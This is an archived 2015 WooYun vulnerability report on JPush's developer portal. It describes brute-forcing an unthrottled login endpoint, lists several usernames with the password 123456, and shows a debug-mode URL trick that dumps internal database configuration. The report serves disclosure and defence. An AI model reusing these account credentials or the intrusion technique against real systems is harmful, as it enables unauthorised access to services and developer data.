当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0117090

漏洞标题:极光推送某安全漏洞间接影响用户使用(顺丰、中国电信、去哪儿、凤凰网、大麦网、东方航空等)

相关厂商:jpush.cn

漏洞作者: 鸟云厂商

提交时间:2015-05-30 10:19

修复时间:2015-07-14 15:52

公开时间:2015-07-14 15:52

漏洞类型:用户资料大量泄漏

危害等级:高

自评Rank:18

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2015-05-30: 细节已通知厂商并且等待厂商处理中
2015-05-30: 厂商已经确认,细节仅向厂商公开
2015-06-09: 细节向核心白帽子及相关领域专家公开
2015-06-19: 细节向普通白帽子公开
2015-06-29: 细节向实习白帽子公开
2015-07-14: 细节向公众公开

简要描述:

自评18Rank不是因为其他,
极光推送某安全漏洞间接影响用户使用(顺丰、中国电信、去哪儿、凤凰网、大麦网、东方航空等)

详细说明:

http://iportal.jpush.cn
该系统登录接口未做限制导致可爆破

URL http://iportal.jpush.cn/login/
POST username=****&password=123456


得到一批账号

wangwei	123456
zhuolin 123456
huihh 123456
chengzhengfeng 123456
wangmj 123456
wangfeng 123456
andy 123456
huangzd 123456


登录

屏幕快照 2015-05-30 上午3.04.31.png


可以修改APP的推送设置,操作开关(突然某一天PUSH发不出了用户一定要疯)
举几个栗子
#1 顺丰速运

2DBC5813-4F09-45BB-B3E1-A4D79A924886.png


#2 途牛旅游(用户数2500W)

A7763C04-C592-4FC3-9C42-7D469EC70C47.png


#3 深圳交警

B1FB3E0B-345B-423C-A34F-E73E952B701C.png


#4 天翼客服(1200W用户)

B9657CB5-9625-4C57-9E64-EA44AEE10FFE.png


#5 神州租车(300W用户)

D8C15A57-8179-484B-A3EB-BEEE7825D144.png


#6 迅雷看看(5400W用户)

E6FDF42B-F392-444B-B5DA-D60831AB8F14.png


可操作10W余个APP的Push开关

0558154C-64CD-4881-A35D-A5C4782284B8.png


泄露7W开发者信息,包括电话、QQ、邮箱、所在公司,并可以修改开发者权限(升级高级账户)

CF489176-CD28-4D8B-BBBB-AD1E0926331B.png


该系统调试模式没关也泄露部分信息

http://iportal.jpush.cn/devinfo/?devid=69726@


加个@直接爆出来

{'api': {'ENGINE': 'django.db.backends.mysql',
'HOST': '192.168.****.35',
'NAME': 'kkpush',
'OPTIONS': {},
'PASSWORD': u'********************',
'PORT': '3306',
'TEST_CHARSET': None,
'TEST_COLLATION': None,
'TEST_MIRROR': None,
'TEST_NAME': None,
'TIME_ZONE': 'Etc/GMT-8',
'USER': 'push_root'},
'default': {'ENGINE': 'django.db.backends.oracle',
'HOST': '192.168.****.36',
'NAME': 'kktalk',
'OPTIONS': {},
'PASSWORD': u'********************',
'PORT': '1521',
'TEST_CHARSET': None,
'TEST_COLLATION': None,
'TEST_MIRROR': None,
'TEST_NAME': None,
'TIME_ZONE': 'Etc/GMT-8',
'USER': 'kkpush'},
'iportaldb': {'ENGINE': 'django.db.backends.mysql',
'HOST': '192.168.****.192',
'NAME': 'iportal',
'OPTIONS': {},
'PASSWORD': u'********************',
'PORT': '3306',
'TEST_CHARSET': None,
'TEST_COLLATION': None,
'TEST_MIRROR': None,
'TEST_NAME': None,
'TIME_ZONE': 'Etc/GMT-8',
'USER': 'iportaldml'},
'mysql': {'ENGINE': 'django.db.backends.mysql',
'HOST': '192.168.****.27',
'NAME': 'developerdb',
'OPTIONS': {},
'PASSWORD': u'********************',
'PORT': '3306',
'TEST_CHARSET': None,
'TEST_COLLATION': None,
'TEST_MIRROR': None,
'TEST_NAME': None,
'TIME_ZONE': 'Etc/GMT-8',
'USER': 'iportal_db'},
'pushdb': {'ENGINE': 'django.db.backends.mysql',
'HOST': '****.31.****.117',
'NAME': 'PushSDK',
'OPTIONS': {},
'PASSWORD': u'********************',
'PORT': '3306',
'TEST_CHARSET': None,
'TEST_COLLATION': None,
'TEST_MIRROR': None,
'TEST_NAME': None,
'TIME_ZONE': 'Etc/GMT-8',
'USER': 'root'},
'statsdb': {'ENGINE': 'django.db.backends.mysql',
'HOST': '192.168.****.204',
'NAME': 'statsdb',
'OPTIONS': {},
'PASSWORD': u'********************',
'PORT': '3306',
'TEST_CHARSET': None,
'TEST_COLLATION': None,
'TEST_MIRROR': None,
'TEST_NAME': None,
'TIME_ZONE': 'Etc/GMT-8',
'USER': 'stats_dev'}}

漏洞证明:

修复方案:

版权声明:转载请注明来源 鸟云厂商@乌云


漏洞回应

厂商回应:

危害等级:高

漏洞Rank:17

确认时间:2015-05-30 15:50

厂商回复:

感谢漏洞提供者,此系统没有发送消息权限。

最新状态:

暂无